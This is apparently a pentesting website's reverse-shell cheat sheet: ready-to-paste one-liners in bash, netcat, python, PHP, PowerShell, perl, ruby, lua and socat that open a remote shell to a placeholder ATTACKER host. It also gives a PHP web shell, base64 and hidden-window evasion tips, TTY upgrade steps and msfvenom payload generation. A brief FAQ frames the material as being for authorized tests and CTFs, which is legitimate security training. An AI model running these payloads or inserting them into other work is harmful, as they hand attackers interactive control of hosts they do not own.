Reverse Shell Cheatsheet 2026

Every reverse shell payload you need — bash, python, PHP, PowerShell, nc, socat, perl, ruby — plus listener setup and the full TTY upgrade. Copy-paste ready for CTFs, labs and authorized pentests.

Last updated:

New to pentesting? Read our complete beginner's guide to see where getting a shell fits in the methodology.

Quick Navigation

01 Set Up a Listener 02 Bash 03 Netcat 04 Python 05 PHP 06 PowerShell 07 Perl / Ruby / Others 08 Socat (stable) 09 TTY Upgrade 10 msfvenom

# Set Up a Listener

Before running any payload, start a listener on your attacker box. Port 443 or 80 blends in with normal traffic and is rarely filtered outbound.

nc -lvnp 443
Classic netcat listener — verbose, no DNS, port 443
rlwrap nc -lvnp 443
Listener with readline — arrow keys, history, backspace work
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 443; run"
Metasploit multi/handler listener

# Bash Reverse Shells

Bash is on almost every Linux host. The /dev/tcp method needs no extra binary.

bash -i >& /dev/tcp/ATTACKER/443 0>&1
The classic bash reverse shell via /dev/tcp
bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
Wrapped in bash -c for command-injection contexts
0<&196;exec 196<>/dev/tcp/ATTACKER/443; sh <&196 >&196 2>&196
Alternative using a custom file descriptor
💡 Tip: Being sent through a web param? URL-encode it, or base64 it: echo -n 'bash -i >& ...' | base64 then echo BASE64 | base64 -d | bash.

# Netcat Reverse Shells

If netcat is installed, it's the simplest option. Watch which variant is present — some lack the -e flag.

nc -e /bin/sh ATTACKER 443
Netcat with -e (traditional / GNU netcat)
nc ATTACKER 443 -e /bin/bash
Same, argument order variant
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 443 >/tmp/f
Netcat WITHOUT -e (OpenBSD netcat) — the mkfifo trick
ncat ATTACKER 443 -e /bin/bash
Ncat (from Nmap)
ncat --ssl ATTACKER 443 -e /bin/bash
Ncat with SSL — encrypted reverse shell

# Python Reverse Shells

Python is present on most Linux systems. Use python3, fall back to python.

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER",443));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")'
Python3 reverse shell — already spawns a PTY
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Python2 fallback

# PHP Reverse Shells

Perfect after a file upload on a web server, or via LFI/RCE.

php -r '$sock=fsockopen("ATTACKER",443);exec("/bin/sh -i <&3 >&3 2>&3");'
One-liner PHP reverse shell
<?php system($_GET['cmd']); ?>
Minimal web shell — trigger a reverse shell via ?cmd=
php -r '$s=fsockopen("ATTACKER",443);$p=proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$pipes);'
proc_open variant — works when exec is disabled

# PowerShell Reverse Shells (Windows)

PowerShell is the go-to on Windows. The one-liner works on virtually every modern Windows host.

powershell -nop -c "$c=New-Object System.Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$sby=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()}"
The classic Nishang-style PowerShell reverse shell one-liner
powershell -nop -w hidden -e BASE64_ENCODED_PAYLOAD
Base64-encoded (UTF-16LE) payload to bypass quoting issues
💡 Tip: Generate the base64 (UTF-16LE) payload on Linux: echo -n 'IEX...' | iconv -t UTF-16LE | base64 -w0.

# Perl, Ruby & Others

Fallbacks when bash/python/nc aren't available.

perl -e 'use Socket;$i="ATTACKER";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
Perl reverse shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER",443);loop{c.puts `#{c.gets.chomp}`}'
Ruby reverse shell
xterm -display ATTACKER:1
xterm reverse (needs an X server + xhost + on your side)
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ATTACKER',443);os.execute('/bin/sh -i <&3 >&3 2>&3');"
Lua reverse shell

# Socat — Fully Stable Shell

Socat gives a fully interactive TTY straight away — no manual stty tricks. Transfer the socat binary if needed.

socat file:`tty`,raw,echo=0 tcp-listen:443
Listener side — run this on your attacker box
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:443
Target side — full interactive TTY reverse shell
socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0 file:`tty`,raw,echo=0
Encrypted listener (generate cert.pem with openssl first)

# Upgrade to a Full TTY

A raw netcat shell is fragile — Ctrl+C kills it and vim/ssh/su break. Upgrade it in four steps.

python3 -c 'import pty;pty.spawn("/bin/bash")'
Step 1: spawn a PTY (try script -qc /bin/bash /dev/null if no python)
export TERM=xterm
Step 2: set the terminal type (enables clear, vim, etc.)
Ctrl+Z
Step 3: background the shell
stty raw -echo; fg
Step 4: fix the local terminal and foreground — full TTY, Ctrl+C safe
💡 Tip: After the upgrade, run stty -a in your own terminal to read rows/cols, then set them in the shell: stty rows 38 cols 116 so full-screen apps render correctly.

# msfvenom Payloads

Generate standalone reverse shell binaries and scripts when you need a file to drop.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f exe -o rev.exe
Windows x64 reverse shell executable
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o rev.elf
Linux x64 reverse shell ELF
msfvenom -p php/reverse_php LHOST=IP LPORT=443 -f raw -o rev.php
PHP reverse shell script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o met.exe
Meterpreter (catch with multi/handler)

❓ Reverse Shell FAQ

A shell session where the target connects back to the attacker's listener instead of the attacker connecting in. This bypasses inbound firewalls since outbound traffic is usually allowed. Start a listener (nc -lvnp 443) and run a payload on the target.

Reverse: the target connects out to you (bypasses inbound firewalls). Bind: the target opens a port and you connect in (needs that port reachable). Reverse shells are preferred because outbound is rarely blocked.

nc -lvnp 443 is the classic. Use rlwrap nc -lvnp 443 for arrow-key history, or a Metasploit multi/handler with a matching payload.

A raw netcat shell has no TTY — Ctrl+C kills it and vim/ssh/su freeze. Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")', then Ctrl+Z, then stty raw -echo; fg, then export TERM=xterm.

Match what's installed. Linux: bash and python are almost always there. Windows: PowerShell. If netcat has -e, that's simplest. Keep a socat option for a fully stable, encrypted shell.

Socat is the cleanest: socat file:`tty`,raw,echo=0 tcp-listen:443 on your host and socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:443 on the target.

msfvenom -p <payload> LHOST=IP LPORT=443 -f <format> -o out. E.g. windows/x64/shell_reverse_tcp ... -f exe. Catch with a matching nc -lvnp 443 or multi/handler.

They are legitimate for authorized pentests, CTFs and your own labs. Using them against systems you don't own or lack written permission to test is illegal. Always stay in scope.

📚 Related Resources

AI-Assisted Pentest Report

Turn your access into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This reverse shell cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →